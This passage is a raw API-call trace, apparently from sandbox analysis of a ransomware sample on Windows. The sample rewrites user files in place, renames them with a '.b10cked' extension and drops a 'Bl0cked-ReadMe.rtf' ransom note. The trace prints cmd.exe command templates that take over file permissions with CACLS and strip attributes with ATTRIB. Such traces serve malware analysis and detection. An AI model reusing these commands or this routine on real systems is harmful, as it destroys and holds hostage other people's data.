lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x30400 [0214.960] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.960] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.960] ReadFile (in: 
hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0215.078] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x91ff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x91ff, lpOverlapped=0x0) returned 1 [0215.087] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0215.087] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0215.088] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x91ff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x91ff, lpOverlapped=0x0) returned 1 [0215.088] SetFilePointer (in: hFile=0x120, lDistanceToMove=-98815, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x18201 [0215.088] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0215.089] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x91ff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x91ff, lpOverlapped=0x0) returned 1 [0215.102] SetFilePointer (in: hFile=0x120, lDistanceToMove=-98815, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x18201 [0215.102] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xf000, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0215.102] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x91ff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x91ff, lpOverlapped=0x0) returned 1 [0215.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTUSER.DAT.LOG1", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTUSER.DAT.LOG1", cchWideChar=15, lpMultiByteStr=0x13131ec, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTUSER.DAT.LOG1", lpUsedDefaultChar=0x0) returned 15 [0215.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x30400 [0215.106] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0215.107] CloseHandle (hObject=0x120) returned 1 [0215.108] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\NTUSER~1.LOG") returned 0x1d [0215.109] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\") returned 0x11 [0215.109] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, 
bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe08, dwThreadId=0x600)) returned 1 [0215.110] CloseHandle (hObject=0x1b4) returned 1 [0215.110] CloseHandle (hObject=0x120) returned 1 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0215.110] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\", cchCount1=17, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 1 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0215.110] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\", cchCount1=17, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0215.110] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0215.111] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > 
\"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0215.111] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0215.111] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\") returned 0x11 [0215.111] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0215.111] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0215.111] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbbc, dwThreadId=0xb74)) returned 1 [0215.116] CloseHandle (hObject=0x1b4) returned 1 [0215.116] CloseHandle (hObject=0x120) returned 1 [0215.116] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf")) returned 0xffffffff [0215.116] GetLastError () returned 0x2 [0215.116] CopyFileW 
(lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0215.121] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf")) returned 0x20 [0215.121] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0215.121] FindFirstFileW (in: lpFileName="C:\\Users\\Default", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0215.121] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0215.121] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0215.121] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0215.121] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0215.122] CloseHandle (hObject=0x1b4) returned 1 [0215.122] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0215.122] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0215.122] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb28, dwThreadId=0xa3c)) returned 1 [0215.126] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] CloseHandle (hObject=0x120) returned 1 [0216.113] CloseHandle (hObject=0x1b4) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0216.113] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.113] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.113] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.113] CloseHandle (hObject=0x1b4) returned 1 [0216.113] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0216.113] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0216.114] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\", cchCount1=17, lpString2="C:\\USERS\\DEFAULT\\", cchCount2=17) returned 2 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] 
ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0216.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms", lpFilePart=0x12eab4*="Everywhere.search-ms") returned 0x2e [0216.116] GetLastError () returned 0x5 [0216.116] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0216.116] LocalFree (hMem=0x1c6cc8) returned 0x0 [0216.116] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0216.116] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0216.116] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0216.116] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0216.116] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0216.116] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0216.116] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x53c, dwThreadId=0xc68)) returned 1 [0216.120] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] CloseHandle (hObject=0x120) returned 1 [0216.433] CloseHandle (hObject=0x1b4) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0216.433] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.433] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27322279697) returned 1 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] 
